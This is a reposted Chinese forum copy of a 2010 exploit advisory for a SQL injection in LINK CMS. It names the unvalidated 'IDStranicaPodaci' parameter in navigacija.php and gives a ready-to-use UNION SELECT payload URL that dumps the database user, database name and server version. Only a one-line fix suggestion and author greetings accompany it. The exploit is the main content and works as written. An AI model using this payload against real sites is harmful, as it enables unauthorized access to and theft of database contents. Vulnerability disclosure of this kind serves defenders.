首页
社区
课程
招聘
[转帖]LINK CMS SQL Injection Vulnerability
发表于: 2010-8-25 11:10 1672

[转帖]LINK CMS SQL Injection Vulnerability

2010-8-25 11:10
1672
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.pentesting-rs.org
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################

===[ Exploit ]===

.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

===[ Example ]===

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--

===[ Solution ]===

.:. Input validation of "IDStranicaPodaci" parameter should be corrected.

Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-)))

[课程]Android-CTF解题方法汇总!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//